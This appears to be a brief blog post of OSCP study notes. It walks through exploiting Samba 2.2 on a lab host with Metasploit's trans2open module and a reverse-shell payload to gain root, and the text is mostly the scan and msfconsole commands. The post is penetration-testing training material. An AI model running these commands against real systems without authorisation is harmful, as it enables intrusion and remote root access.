OSCP Security Technology - Gaining Root with Metasploit

OSCP Security Technology - Gaining Root with Metasploit

Analysis nmap scanning result.

image-20210707075501995

searchsploit samba 2.2 

image-20210707080027869

msfconsole
search trans2open
use exploit/linux/samba/trans2open
show options

image-20210707080550750

set rhost 192.168.2.28
show targets
exploit

image-20210707081352600

We need change the payload setting.

show options
set payload generic/shell_reverse_tcp
exploit

image-20210707081648763

image-20210707081948209

posted @ 2021-07-07 08:21  晨风_Eric  阅读(33)  评论(0编辑  收藏  举报